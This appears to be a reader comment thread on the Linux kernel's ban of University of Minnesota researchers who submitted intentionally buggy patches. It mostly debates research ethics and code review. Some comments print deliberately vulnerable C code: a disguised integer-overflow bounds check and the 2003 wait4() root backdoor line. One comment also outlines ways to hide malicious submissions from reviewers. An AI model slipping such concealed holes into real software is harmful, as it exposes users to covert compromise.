I can still remember when, in 2008, Microsoft sent an anti-piracy command that disabled all the machines running XP in the university where I worked, and class was dismissed. That will have given them extra incentive to try and develop their own version of Linux at that point, which failed miserably.
I also had the unpleasant surprise of finding all of sourceforge blocked because Notepad++ had a page about supporting Tibet on it. My online discussion on MSM was suddenly cut off while discussing how drug use is considered a health issue in the Netherlands, how a Party bigwig who bumped into a foreign exchange student was protected from any blame for it by the camera circuit conveniently failing that day, and the scent of red envelopes all around.
Until 2012, China was actually trying to be more open in many regards, with calls for more creativity as a basis for a successful society. As creativity requires a certain level of questioning authority, that didn't quite pan out much, but there was a discussion and wide spread support for the idea before 2012.
Xi though has released the Nationalist genie from the bottle and dissent is being prosecuted across the board. The Xi clan has by now crushed all dissent within the party and has recently shown how effective its population suppression mechanism is during the pandemic: every community having gated access, a wall to fend off "criminals", and the whereabouts of people (such as foreigners) reported if required.
If the 36 stratagems are anything to go by, this may well have been a bit of both: see the response and learn from that. A lack of ethics is hardly surprising in the US context, and its similarity with the wild-west capitalism of China and deep-rooted corruption makes those two states very much alike. Anything is possible in a kleptocracy.
"the university's Institutional Review Board (IRB) ... determined that the project did not constitute human research and thus granted an ethical review waiver."
Nonsense. This clearly was human research. And it clearly needed review.
OK, it's psychological research, not "inject untested drugs in your arm" research, but the law - 45 CFR 46.102 - doesn't make that distinction:
"d) Research means a systematic investigation, including research development, testing and evaluation, designed to develop or contribute to generalizable knowledge."
"f) Human subject means a living individual about whom an investigator (whether professional or student) conducting research obtains [...] data through intervention or interaction with the individual [....]. Interaction includes communication or interpersonal contact between investigator and subject."
The researchers communicated with the maintainers, as part of a systematic investigation designed to learn things. That makes this human research.
Now, after doing the review, the IRB may have decided to approve the research and waive the consent requirement. I think that would have been a mistake, but it would at least have been arguable. 46.116(d) lists 4 criteria that all have to be met to waive consent. They easily meet 3 of them. The one which is dodgy is "The waiver or alteration will not adversely affect the rights and welfare of the subjects".
The IRB clearly totally misunderstands their job, or are just useless at it, and they should all be fired from the IRB.
Or as another person put it, more succinctly, consent is important. The researchers didn't contact anyone and ask them if they would consent to be part of an experiment.
Deciding that other people's efforts don't matter as long as you think your ends justify your means? That makes you the bad guy.
WTF! What were they thinking?
Duh... Really want to piss off an open-source project? Just make more work for the maintainers who are already so overloaded they barely have time to breathe. And then to find out the extra work was caused by a couple of nitwits with free time on their hands -- and you have the recipe for disaster.
Do I understand the security egghead comments? Sure, and hardening the commit system is for down the road. But was Greg's response an overreaction? No. It was measured and appropriate. It wasn't designed to prevent all future attempts, but instead it was properly punitive, to deter similar behavior by institutions in the future.
You would have thunk institutions learned their lesson about ethically questionable testing after Kaczynski...
It wasn't designed to prevent all future attempts, but instead it was properly punitive, to deter similar behavior by institutions in the future.
Isn't there now a risk of a Streisand effect, where lots of other people will try & sneak code in "for fun", since it's been proved to be possible? Might have been better for the kernel folks to have just had a quiet word with the Uni, while improving the processes which allowed this to happen.
It's been proved to be possible. But that was never really in doubt. (Every time the kernel team accept a bug fix they are implying that they had previously accepted a bug.) What's new here is that we've found out the consequences when you get found out. It doesn't look "fun" to me.
"Isn't there now a risk of a Streisand effect, where lots of other people will try & sneak code in 'for fun", since it's been proved to be possible."
I doubt it. It's not very easy to introduce something just for fun. Submitting a basic patch allows people to say they did something and not have someone angry at them.
"Might have been better for the kernel folks to have just had a quiet word with the Uni, while improving the processes which allowed this to happen."
Oh no it wouldn't. If people were going to tamper with the code, the research paper itself made that idea public. Keeping this quiet would have left that paper as the last word. What the Linux kernel community has done now is to demonstrate that maybe you can insert useless or dangerous code into the kernel, but if you get caught, they will target you with all the power they have. They have established a deterrent to people contemplating pulling the same kind of stunt.
Not sure if this warrants a lawsuit from IBM/others, or a visit from the FBI.
I spend enough time listening to the "Piracy is Theft, $500,000 fine" people. What does the law say about trying to hack software used by many critical infrastructures?
Trying to get hired by companies to put backdoors into their products doesn't really need much academic research by the way. It's a well known attack, with plenty of examples to study without breaking the law yourself.
"One last point worth raising, the kernel teams response should probably treat Uni researchers the same regardless of their nationality. Do we really want them setting a precedent that Uni's in China, Iran, and Russia can attempt unauthorized penetrations without sanctions?"
I imagine I would get the same treatment if I submitted the PRs - and I am not a citizen of any of those countries. A mammoth responsibility to police this.
The facts though cannot be ignored:
1) An accredited University actually approved the research. Is this the way research happens these days?
2) The commits made it to the queue. They did not make it to either staging or linux-next. My worries are for any APT crew or some other three-letter agency - how easy is it to slip in a PR with SE?
It is disappointing on many levels to me.
CVEs usually aren't the result of a single change. Someone changes something, someone changes something else that touches some of the things changed in the first change, and so on, and an invalid assumption somewhere about the entire control flow through a certain code section or lifetime of a data structure results in the CVE.
Not saying your idea doesn't have merit, but it is unlikely you'll find very many CVEs that can be definitively linked to a single submission, and even if you do, you'd have to find a pattern of such submissions from the same source before you could determine it was deliberate.
If I was trying to deliberately bug the Linux kernel, I would ensure that my submissions came from a variety of aliases, making sure to use different coding/commenting styles to the extent possible, having some submissions translated into other languages and then back to English to give them that "English is my second or third language" feel, etc., so they wouldn't be seen as coming from the same source. In other words, I'm pretty sure that if any nation state is bugging up the Linux kernel, you'll never find it by looking at who contributed the patches that resulted in CVEs.
Not that the kernel is the best place for such attacks anyway, since they probably don't need/want kernel level access in most cases.
Don't you think that's the whole idea? Perhaps to trace kernel bugs back to their original source, through however many commits, to find out if there may be a better way to handle code changes? Sure, it sounds complicated as can be, but if it does actually generate a better methodology....
Exactly. The question is not detecting a single malicious commit, but instead identifying how bugs happen. Whether deliberate or accidental, the goal is not to have them. So look at how they came to be and see what patterns there are. Is there a type of bug that doesn't get caught often? If so, can testing or review be improved to detect it? Is there something that reviewers consistently fail to catch? What is it and can something be done to draw their attention to it? That's real effective research.
Have these two researchers been living under a rock for the last many years? Tell me if this sounds like news:
“Penetration without consent is not OK”.
Yes, bad joke, but the principle stands: the experiment might have been interesting also for the Kernel, but the big fishes should have been informed (also only Torvalds, probably, would have been enough).
Done like this, it's just a waste of everybody's time, and banning trolls is usually good policy.
The only regret at this point is that probably we won’t have an uncensored commentary from Linus... given the dumbassery of the two, it would have been just gold.
Until a few months ago, Burger King was my favored drive-thru hamburger restaurant. Good for a quick meal on my way. Then I read an article in one of the national newspapers about a social experiment that BK performed in some of its outlets to see if anyone would stand up to a "bully" abusing another "customer." Despite their laudable goal, I haven't been back since.
Just what I was thinking. Those who might have been considering going to this Uni might now reconsider, thus pulling funds from their coffers. Students aren't morons and they may well consider the Uni leadership to be unethical and idiotic for sanctioning this.
There's also the noise this might make in the "donation depts" of corporate sponsors: will they be prepared to put money into further research projects at a Uni whose leadership has proven to have questionable ethics or a complete lack of common sense?
Losing the ability to make submissions to the core Linux projects might not seem like much, but it's the bad PR noise that will continue to reverberate for a time.
That's a nice dream, but how many 17-year-olds considering a CS degree are keeping up with the news in this sector?
As for the corporates, that's a serious case of glass houses. What most corporations do on a daily basis makes this look positively uplifting.
Heck, how many people right here are going to be able to remember whether it was Wisconsin or Minnesota in three months' time?
Seems to me that if a malign covert agency wished to insert something into the Linux code base then an obvious thing to do is devote a lot of time to developing entirely beneficial updates, and insert their desired malware as just one item within a large number of entirely benign updates. What is more, in such a situation it might even be possible to blame an unknown 3rd party for the malicious code, and retain credibility. This would require the agent to have commitment to play a very long game indeed, but such agents are not entirely unknown.
Agreed with your assessment 100%.
Once the "bad" code reaches production, then it'll be next to impossible to detect... and depending on its level in the hierarchy of the OS, will be either easy to forcibly eject/remove or it will be a real PITA to remove...
Nip these things in the bud before they get a chance to gain a foothold.
So the assumption seems to be: it's open source so everyone can read the code, so there's no point in checking it / hey, what the heck, it's Friday syndrome, let's go / it's from a Uni, it's probably fine. This happened with Netgate and WireGuard, which nearly ended up in BSD. It's also not the first time that something dubious has sneaked in - Canonical found that out with crypto miners being sneaked into snaps. Thank goodness they have an Ubuntu Security Team...
I think we have to face the fact that this is going to become more of a problem with time and, yes, you're going to have to check the code prior to it being released. You could use automation to a certain degree, but in reality it's an independent audit that's going to minimise this.
The bigger question should be how many commits have sneaked through without anyone noticing? Kind of like the sudo privilege escalation vulnerability that sat there for years. Accident / intentional, does it matter? I would imagine some of the best backdoors would come with a healthy dose of plausible deniability.
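On the "plausible deniability" point, the worrying case isn't an obvious backdoor but a change that reads like an honest mistake. Here's a hypothetical C sketch (the names and structures are made up for illustration): a size check quietly defeated by unsigned integer wrap-around, turning a crafted packet into a heap overflow while looking, in a diff, like a perfectly ordinary bounds check.

/* Hypothetical, illustrative only.  hdr_len + payload_len can wrap around
 * 2^32, so a crafted packet passes the check yet memcpy still copies an
 * attacker-chosen, near-4GB length past the end of dst. */
#include <stdint.h>
#include <string.h>

struct packet {
    uint32_t hdr_len;
    uint32_t payload_len;
    const unsigned char *data;
};

int copy_packet(const struct packet *p, unsigned char *dst, uint32_t dst_len)
{
    if (p->hdr_len + p->payload_len > dst_len)   /* wraps: check bypassed */
        return -1;
    memcpy(dst, p->data, p->hdr_len);
    memcpy(dst + p->hdr_len, p->data + p->hdr_len, p->payload_len);
    return 0;
}

/* A safer form rewrites the check so it cannot wrap:
 *     if (p->hdr_len > dst_len || p->payload_len > dst_len - p->hdr_len)
 *         return -1;
 */

A fuzzer or a decent static analyser has a fair chance of flagging the wrap-around; a reviewer skimming the diff on a Friday afternoon probably doesn't -- which is the argument for the independent audit.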
University of Minnesota: Hello github (and gitlab).
github (and gitlab): *ponder* pro-active security... should we temporarily block umn.edu now, and review that decision in 3 to 5 years, or maybe 10?
I wonder how this will affect the University of Minnesota future donations and endowments. Although if the whole sexual assaults thing had no effect I guess this will have none either.
https://en.wikipedia.org/wiki/University_of_Minnesota#Sexual_assaults
I think the previous commentards have covered this pretty well, but the thing that occurs to me is that not only have these numpties trashed their own credibility, but have also potentially damaged the prospects of all the other students at the Uni - as well as those that have left recently and just entered the job market.
I can just see an HR dept, looking through resumes, "Hmmm studied at... Oh." {shuffle} Hey this guy in Canada looks good.
The response of Linux maintainers here is childish. This demonstrates flaws in their code review process, they should be thanking the University of Minnesota team instead of banning anyone with a umn.edu email address (a meaningless and pointless gesture).
Open source software is supposed to be about openness and this is the sort of thing you'd expect from Microsoft.
In the councils of government and public institutions, we must guard against the acquisition of unwarranted influence, whether sought or unsought, by the Evergreen-Woke complex. The potential for the disastrous rise of misplaced code and conduct exists and will persist. We must never let the weight of this combination endanger our liberties or democratic processes.
...IFF they'd followed the same procedure as in "Red Team" / "White-Hat Hacker" penetration testing: cleared it with someone high up in the command chain (Greg K-H, or Linus?) beforehand. Just like at any company that conducts such a test, the head of security (or, if they are also being tested, the CTO / CEO or some such) is in the loop.
Then that person could have quietly followed the patches' path through the review process (they should of course be alerted to the specific intentionally-bugged ones through private communication) and stopped them on some pretense -- perhaps by just actually "finding" the bug themselves -- if they got too far. (And the "reveal" after the experiment was over would most probably have been received differently by the maintainers if it then came from that person.)
Without that, though, I can't see how it's legitimate.
The fundamental problem an OSS project has is finding enough time for its members to do the work. What this carelessly thought-out episode has done is to highlight that.
What it shows is that you can get control of such a project so that you can inject code: simply have more resources.
Say a mega corp wanted control of an OSS project. By allocating a lot of resources to the project, its people's work starts outstripping everyone else's. Gradually the project takes on more of the flavour of the mega corp and less of the original team. Once everyone using it is hooked and cannot reasonably sustain a fork, you have control.
It's still OSS, but no one else has the resources to benefit from the openness.
And this has already happened. Anyone heard of RedHat, Pulse Audio, Systemd, and the thing that forces us to use those things: Gnome?
I rest my case.
Would not be to see if it could penetrate the infrastructure. That's not the sort of thing you can risk; you either do or you do not. The motivation for the CCP would be to slow down/weaken kernel development generally: wasting people's time, generating controversy, generally monkey-wrenching the process. Do enough of that, and the volunteers find better uses for their time.
The ban is of course ceremonial. But the only other thing to do would be to attempt a class action lawsuit, and how much time would that waste? Personally, I would send a bill, and go VERY public when it was rejected.
As someone else mentioned, if they had targeted a corporate-run organization, a lawsuit almost certainly would have been forthcoming.
How the mighty have fallen and been cast down. The school that gave us Gopher has now been banned from the Linux Kernel. And banned for a Bad Idea so stupid and bone-headed it's as if the whole scheme was dreamt up by a drunken freshman at his first Frat party.
I can say, without a shadow of a doubt, that I never thought I'd see this day.
Not one mention of the attempted backdooring of the Linux kernel in 2003 through the BitKeeper repository:
https://freedom-to-tinker.com/2013/10/09/the-linux-backdoor-attempt-of-2003/
What happened then was a malicious attack by a high-profile actor, and while it was caught, it has never (as far as I know) been cleared up. Since then, BitKeeper has been replaced by git, but I also never saw an investigation into whether git would intercept the same attack. What GKH here clearly says is that he's not interested in such an investigation, doesn't want anyone to even consider testing such an intrusion, and that everybody should just trust him because he's the good guy.
So, before going any further, what happened with that 2003 attempt? Who was behind it? How did they pull it off? What has been undertaken by the kernel "community" to prevent the same scenario from happening again?
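For anyone who doesn't want to click through: the mechanics are in the linked write-up. The change was two lines added to wait4() in kernel/exit.c, and the whole trick is a single = where == belongs (quoted below from the article; the surrounding function is omitted):

/* As reproduced in the freedom-to-tinker article linked above.  Calling
 * wait4() with the odd __WCLONE|__WALL flag combination silently sets the
 * caller's uid to 0 (root); because the assignment evaluates to 0, the &&
 * short-circuits and -EINVAL is never returned, so nothing looks amiss. */
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

Per that article, it never went through review at all: it was slipped directly into the CVS mirror and was caught because the bogus commit didn't correspond to anything in the primary BitKeeper history -- so the review process itself was never actually exercised by that attempt.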
If a bunch of white-hats investigate the security of a commercial product without asking (because the supplier doesn't care about security, and should, or because they know it's insecure and are trying to hide it), we have no problem with that - especially if the vulnerability causes PII to be leaked. Attempts to apply various Computer Misuse acts, and to sue for damages, are vigorously defended.
So, these guys probed the security of Kernel code submissions. This is also a product for which security is very important. The response has been to dump on the researchers, instead of tightening security procedures. The fact that many (not all) of the staff that were inconvenienced are volunteers is neither here nor there.
Pot/Kettle?
Linux Kernel security is one of the most important things in IT today. Security-checking patches is part of the job.